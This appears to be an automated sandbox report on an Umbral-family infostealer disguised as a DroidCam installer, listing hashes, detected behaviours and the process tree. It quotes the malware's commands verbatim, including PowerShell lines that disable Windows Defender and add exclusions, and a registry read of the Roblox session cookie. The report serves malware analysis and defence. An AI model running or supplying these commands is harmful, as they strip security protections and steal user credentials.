Analysis
-
max time kernel
93s -
max time network
95s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
10-07-2024 22:26
Static task
static1
Behavioral task
behavioral1
Sample
DroidCamappmdreash.exe
Resource
win10v2004-20240709-en
General
-
Target
DroidCamappmdreash.exe
-
Size
485KB
-
MD5
702671a992bfd53ecfe53db95ace5780
-
SHA1
4186b1a1fa60a92cfa2aeaf1573839fe4dd3a6fe
-
SHA256
2976987f3bc3c8f28537347c4c642f9ad2864d9968917d4bfe8ceed4c8fb2c6b
-
SHA512
173a0af18d42bb171dee23841903d7ad81a09ac6221281df5660cbc4e1e0b3a1e007d6af55bb4fe5a87e27b76e256bd6ff94c972bed2caf44ffdbca66cb2ad0e
-
SSDEEP
12288:JLLob7STubLXytmeS1HCShL8/l5DQ3YuqUzttxv:JfI7Z441iMQ/DEfhtZ
Malware Config
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000600000001e7b7-23.dat family_umbral behavioral1/memory/3216-38-0x000002C625780000-0x000002C6257C6000-memory.dmp family_umbral -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 4124 powershell.exe 1468 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts dead-payload1.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\Control Panel\International\Geo\Nation DroidCamappmdreash.exe -
Executes dropped EXE 2 IoCs
pid Process 3216 dead-payload1.exe 1808 DroidCamApp.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1705699165-553239100-4129523827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dead-payload1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\dead-payload1.exe" DroidCamappmdreash.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 30 discord.com 29 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 ip-api.com -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1628 wmic.exe -
Runs ping.exe 1 TTPs 1 IoCs
pid Process 3868 PING.EXE -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 4124 powershell.exe 4124 powershell.exe 3216 dead-payload1.exe 1468 powershell.exe 1468 powershell.exe 3480 powershell.exe 3480 powershell.exe 3368 powershell.exe 3368 powershell.exe 60 powershell.exe 60 powershell.exe 4308 powershell.exe 4308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 4124 powershell.exe Token: SeDebugPrivilege 3216 dead-payload1.exe Token: SeIncreaseQuotaPrivilege 3248 wmic.exe Token: SeSecurityPrivilege 3248 wmic.exe Token: SeTakeOwnershipPrivilege 3248 wmic.exe Token: SeLoadDriverPrivilege 3248 wmic.exe Token: SeSystemProfilePrivilege 3248 wmic.exe Token: SeSystemtimePrivilege 3248 wmic.exe Token: SeProfSingleProcessPrivilege 3248 wmic.exe Token: SeIncBasePriorityPrivilege 3248 wmic.exe Token: SeCreatePagefilePrivilege 3248 wmic.exe Token: SeBackupPrivilege 3248 wmic.exe Token: SeRestorePrivilege 3248 wmic.exe Token: SeShutdownPrivilege 3248 wmic.exe Token: SeDebugPrivilege 3248 wmic.exe Token: SeSystemEnvironmentPrivilege 3248 wmic.exe Token: SeRemoteShutdownPrivilege 3248 wmic.exe Token: SeUndockPrivilege 3248 wmic.exe Token: SeManageVolumePrivilege 3248 wmic.exe Token: 33 3248 wmic.exe Token: 34 3248 wmic.exe Token: 35 3248 wmic.exe Token: 36 3248 wmic.exe Token: SeIncreaseQuotaPrivilege 3248 wmic.exe Token: SeSecurityPrivilege 3248 wmic.exe Token: SeTakeOwnershipPrivilege 3248 wmic.exe Token: SeLoadDriverPrivilege 3248 wmic.exe Token: SeSystemProfilePrivilege 3248 wmic.exe Token: SeSystemtimePrivilege 3248 wmic.exe Token: SeProfSingleProcessPrivilege 3248 wmic.exe Token: SeIncBasePriorityPrivilege 3248 wmic.exe Token: SeCreatePagefilePrivilege 3248 wmic.exe Token: SeBackupPrivilege 3248 wmic.exe Token: SeRestorePrivilege 3248 wmic.exe Token: SeShutdownPrivilege 3248 wmic.exe Token: SeDebugPrivilege 3248 wmic.exe Token: SeSystemEnvironmentPrivilege 3248 wmic.exe Token: SeRemoteShutdownPrivilege 3248 wmic.exe Token: SeUndockPrivilege 3248 wmic.exe Token: SeManageVolumePrivilege 3248 wmic.exe Token: 33 3248 wmic.exe Token: 34 3248 wmic.exe Token: 35 3248 wmic.exe Token: 36 3248 wmic.exe Token: SeDebugPrivilege 1468 powershell.exe Token: SeDebugPrivilege 3480 powershell.exe Token: SeDebugPrivilege 3368 powershell.exe Token: SeDebugPrivilege 60 powershell.exe Token: SeIncreaseQuotaPrivilege 1168 wmic.exe Token: SeSecurityPrivilege 1168 wmic.exe Token: SeTakeOwnershipPrivilege 1168 wmic.exe Token: SeLoadDriverPrivilege 1168 wmic.exe Token: SeSystemProfilePrivilege 1168 wmic.exe Token: SeSystemtimePrivilege 1168 wmic.exe Token: SeProfSingleProcessPrivilege 1168 wmic.exe Token: SeIncBasePriorityPrivilege 1168 wmic.exe Token: SeCreatePagefilePrivilege 1168 wmic.exe Token: SeBackupPrivilege 1168 wmic.exe Token: SeRestorePrivilege 1168 wmic.exe Token: SeShutdownPrivilege 1168 wmic.exe Token: SeDebugPrivilege 1168 wmic.exe Token: SeSystemEnvironmentPrivilege 1168 wmic.exe Token: SeRemoteShutdownPrivilege 1168 wmic.exe Token: SeUndockPrivilege 1168 wmic.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1808 DroidCamApp.exe 1808 DroidCamApp.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1808 DroidCamApp.exe 1808 DroidCamApp.exe -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 748 wrote to memory of 4124 748 DroidCamappmdreash.exe 86 PID 748 wrote to memory of 4124 748 DroidCamappmdreash.exe 86 PID 748 wrote to memory of 3216 748 DroidCamappmdreash.exe 88 PID 748 wrote to memory of 3216 748 DroidCamappmdreash.exe 88 PID 748 wrote to memory of 1808 748 DroidCamappmdreash.exe 89 PID 748 wrote to memory of 1808 748 DroidCamappmdreash.exe 89 PID 748 wrote to memory of 1808 748 DroidCamappmdreash.exe 89 PID 3216 wrote to memory of 3248 3216 dead-payload1.exe 90 PID 3216 wrote to memory of 3248 3216 dead-payload1.exe 90 PID 3216 wrote to memory of 1680 3216 dead-payload1.exe 93 PID 3216 wrote to memory of 1680 3216 dead-payload1.exe 93 PID 3216 wrote to memory of 1468 3216 dead-payload1.exe 95 PID 3216 wrote to memory of 1468 3216 dead-payload1.exe 95 PID 3216 wrote to memory of 3480 3216 dead-payload1.exe 97 PID 3216 wrote to memory of 3480 3216 dead-payload1.exe 97 PID 3216 wrote to memory of 3368 3216 dead-payload1.exe 99 PID 3216 wrote to memory of 3368 3216 dead-payload1.exe 99 PID 3216 wrote to memory of 60 3216 dead-payload1.exe 101 PID 3216 wrote to memory of 60 3216 dead-payload1.exe 101 PID 3216 wrote to memory of 1168 3216 dead-payload1.exe 103 PID 3216 wrote to memory of 1168 3216 dead-payload1.exe 103 PID 3216 wrote to memory of 3364 3216 dead-payload1.exe 105 PID 3216 wrote to memory of 3364 3216 dead-payload1.exe 105 PID 3216 wrote to memory of 3896 3216 dead-payload1.exe 107 PID 3216 wrote to memory of 3896 3216 dead-payload1.exe 107 PID 3216 wrote to memory of 4308 3216 dead-payload1.exe 109 PID 3216 wrote to memory of 4308 3216 dead-payload1.exe 109 PID 3216 wrote to memory of 1628 3216 dead-payload1.exe 111 PID 3216 wrote to memory of 1628 3216 dead-payload1.exe 111 PID 3216 wrote to memory of 1548 3216 dead-payload1.exe 113 PID 3216 wrote to memory of 1548 3216 dead-payload1.exe 113 PID 1548 wrote to memory of 3868 1548 cmd.exe 115 PID 1548 wrote to memory of 3868 1548 cmd.exe 115 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 1680 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\DroidCamappmdreash.exe"C:\Users\Admin\AppData\Local\Temp\DroidCamappmdreash.exe"1⤵
- Checks computer location settings
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:748 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dead-payload1.exe'2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4124
-
-
C:\Users\Admin\AppData\Local\Temp\dead-payload1.exe"C:\Users\Admin\AppData\Local\Temp\dead-payload1.exe"2⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3216 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:3248
-
-
C:\Windows\SYSTEM32\attrib.exe"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\dead-payload1.exe"3⤵
- Views/modifies file attributes
PID:1680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\dead-payload1.exe'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1468
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 23⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3368
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:60
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" os get Caption3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1168
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" computersystem get totalphysicalmemory3⤵PID:3364
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵PID:3896
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4308
-
-
C:\Windows\System32\Wbem\wmic.exe"wmic" path win32_VideoController get name3⤵
- Detects videocard installed
PID:1628
-
-
C:\Windows\SYSTEM32\cmd.exe"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\dead-payload1.exe" && pause3⤵
- Suspicious use of WriteProcessMemory
PID:1548 -
C:\Windows\system32\PING.EXEping localhost4⤵
- Runs ping.exe
PID:3868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\DroidCamApp.exe"C:\Users\Admin\AppData\Local\Temp\DroidCamApp.exe"2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1808
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5d85ba6ff808d9e5444a4b369f5bc2730
SHA131aa9d96590fff6981b315e0b391b575e4c0804a
SHA25684739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f
SHA5128c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249
-
Filesize
1KB
MD5276798eeb29a49dc6e199768bc9c2e71
SHA15fdc8ccb897ac2df7476fbb07517aca5b7a6205b
SHA256cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc
SHA5120d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2
-
Filesize
1KB
MD51927062659a9e61ab42aae0f33ddee39
SHA1940cee2cc1cdc3320eb5abbbfa8120a7c90331cc
SHA25691743380c396db06b3a82ec0031e8245e75af2babb2740a0a0699de538be4a98
SHA512c82745603ddd11046b8309c9cb287ae7eee84ef24404941f16b2dd38324e2204853ea8d4a3fcb44641243a41b7a8b01e70f5a99143606101a59d863b9ed6b9aa
-
Filesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
Filesize
944B
MD534f595487e6bfd1d11c7de88ee50356a
SHA14caad088c15766cc0fa1f42009260e9a02f953bb
SHA2560f9a4b52e01cb051052228a55d0515911b7ef5a8db3cf925528c746df511424d
SHA51210976c5deaf9fac449e703e852c3b08d099f430de2d7c7b8e2525c35d63e28b890e5aab63feff9b20bca0aaf9f35a3ba411aee3fbeee9ea59f90ed25bd617a0b
-
Filesize
948B
MD517d8127be94d3c1b6fcc9a4ed585003e
SHA1789874fcc7c778c723f3e89822d8cc8750c6c4c8
SHA256ea357ad1f95863b3618d31e5b0f90495331f64de2b784d9e185b48668c937a7b
SHA512bb18b6d07d82227f5cfbe3eb460df79ec892c560ad2964dcd4782aa26336ae15059843bf46a739bdd4a4daa58057f99102531a756a1cf434ce6449b3cd35a98e
-
Filesize
942KB
MD5f8c12fc1b20887fdb70c7f02f0d7bfb3
SHA128d18fd281e17c919f81eda3a2f0d8765f57049f
SHA256082f5c3fd2fd80505cbd4dbdbb7c50e83c2e81f033a04ea53832dbf0a3fc4933
SHA51297c5d158abb119e076ace4b1398de19029b5d44566d9a293811bf7edbb0db120354cc396aed72bf62766799dc5db266d4b2ee7aee3ffc2818d8be77a4665ad2f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
254KB
MD5db097f7ccf1c6198cb1e5a904979e487
SHA1609060c7c886fd3e4ed106be3371877e2d2cd6a0
SHA25626746bcb408b18a21f86f033fdf6f36628dbc3fa2e0fef153dce5379e5cf70d6
SHA5121bcc00b5812058e045008e2fffd3cf0f8ab69fee38e7dbee8c4e378f1eb74bba8083e54eba3ebe9f2de83410dd1cded12a7155385c43dd343c33b9a82f4647f6